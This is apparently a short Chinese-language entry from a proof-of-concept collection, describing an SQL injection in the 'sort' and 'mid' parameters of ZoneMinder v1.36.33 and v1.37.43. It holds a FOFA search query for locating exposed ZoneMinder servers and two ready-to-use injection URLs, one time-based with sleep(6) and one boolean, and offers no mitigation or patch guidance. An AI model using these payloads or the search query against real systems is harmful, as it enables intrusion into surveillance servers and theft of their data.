wy876_POC/ZoneMinder/ZoneMinder系统sort接口存在SQL注入漏洞.md
2025-01-04 14:11:18 +08:00

647 B

ZoneMinder系统sort接口存在SQL注入漏洞

Zoneminder v1.36.33 和 v1.37.43 受到 SQL 注入漏洞的影响。

fofa

app="ZoneMinder"

poc

http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request

image

漏洞来源